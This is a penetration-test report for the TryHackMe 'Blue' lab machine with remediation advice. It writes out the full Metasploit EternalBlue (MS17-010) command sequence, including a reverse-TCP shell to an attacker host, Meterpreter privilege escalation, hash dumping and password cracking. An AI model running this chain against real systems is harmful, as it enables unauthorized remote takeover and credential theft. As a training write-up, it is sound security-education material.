Technical Report

Detailed analysis for technical teams, covering methodologies, tools, and findings.

Technical Security Report: "Blue" System

Purpose of the Report

This document provides a structured technical assessment of the TryHackMe “Blue” machine. It outlines the phases of the engagement—from initial reconnaissance to post-exploitation activities—documents the tools and techniques used, and presents the findings. Finally, it offers actionable recommendations to remediate identified vulnerabilities and strengthen the system’s security posture.

Methodology

The security evaluation was conducted in the following phases:

  1. Reconnaissance Identification of open ports, services, and known vulnerabilities via automated scanning tools.

  2. Exploitation Leveraging the EternalBlue (MS17-010) exploit to gain initial access.

  3. Privilege Escalation Converting a basic shell to a Meterpreter session, process migration to a SYSTEM-owned process, and dumping password hashes.

  4. Post-Exploitation Cracking extracted hashes and locating high-value files (“flags”) on the target.

Detailed Findings

1. Reconnaissance

  • Tool: nmap

  • Command:

    sudo nmap -sC -sV -Pn -T5 -p1-9999 <target_ip>

  • Results:

    • Open Ports: 445 (SMB) among three ports under 9999.

    • Vulnerability Identified: MS17-010 (EternalBlue) Burattini Machines

  • Impact: The presence of SMBv1 with MS17-010 allows remote code execution, providing a critical entry point.

2. Exploitation

  • Tool: Metasploit Framework

  • Commands:

    msfconsole -q
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set payload windows/x64/shell/reverse_tcp
set LHOST <attacker_ip>
run

  • Results: Successful exploitation yielding a reverse shell on the target.

  • Impact: Demonstrates the ease of exploiting unpatched SMBv1 services for remote shell access.

3. Privilege Escalation

  • Conversion to Meterpreter:

    • Commands:

      Ctrl+Z; sessions -i <session_id>
use post/multi/manage/shell_to_meterpreter
set SESSION <session_id>
run
sessions -u <new_meterpreter_session>

    • Result: Meterpreter session established as SYSTEM.

  • Process Migration:

    • Commands:

      meterpreter> ps
meterpreter> migrate <PID_of_system_process>

    • Result: Migrated into a process running as NT AUTHORITY\SYSTEM.

  • Hash Dumping:

    • Command: meterpreter> hashdump

    • Findings: Extracted NTLM hash for user Jon.

  • Impact: Full SYSTEM privileges allow lateral movement and credential harvesting, severely compromising the environment.

4. Cracking

  • Tool: CrackStation (online)

  • Process: Submitted Jon’s NTLM hash.

  • Result: Plaintext password recovered: alwfna22

  • Impact: Weak password policy enables credential cracking, facilitating further unauthorized access.

5. Flag Retrieval (Post-Exploitation)

  • Flag1

    • Location: C:\flag1.txt

    • Commands:

      bashCopyEditcd C:\
type flag1.txt

  • Flag2

    • Location: C:\Windows\System32\config\flag2.txt

    • Commands:

      bashCopyEditcd C:\Windows\System32\config\
type flag2.txt

  • Flag3

    • Location: C:\Users\Jon\Documents\flag3.txt

    • Commands:

      bashCopyEditcd C:\Users\Jon\Documents
type flag3.txt

  • Impact: Demonstrates complete system compromise with access to sensitive files in protected directories

Recommendations

Short-Term Actions

  • Patch Management: Immediately apply Microsoft’s MS17-010 patch or disable SMBv1 across all hosts.

  • Credential Hygiene: Enforce strong password policies (minimum complexity and length) and rotate existing credentials.

  • Network Segmentation: Restrict SMB traffic to only essential systems via firewall rules or VLAN segmentation.

Long-Term Actions

  • Continuous Vulnerability Scanning: Implement automated scanning (e.g., Nessus, OpenVAS) to detect unpatched services.

  • Privileged Access Management: Deploy Just-In-Time (JIT) access solutions and limit long-standing administrative accounts.

  • Monitoring and Alerting: Tune IDS/IPS to detect anomalous SMB exploit attempts and meterpreter activity.

  • User Awareness: Educate administrators on the risks of legacy protocols and importance of regular patch cycles.

Conclusion

The “Blue” machine was compromised through a well-known SMBv1 vulnerability (MS17-010). The engagement highlighted critical risks arising from unpatched services, weak credentials, and lack of network segmentation. Applying the outlined recommendations—patching, credential hardening, and enhanced monitoring—will substantially reduce the attack surface and improve overall security resilience.

PreviousWrite-upNextExecutive Report

Last updated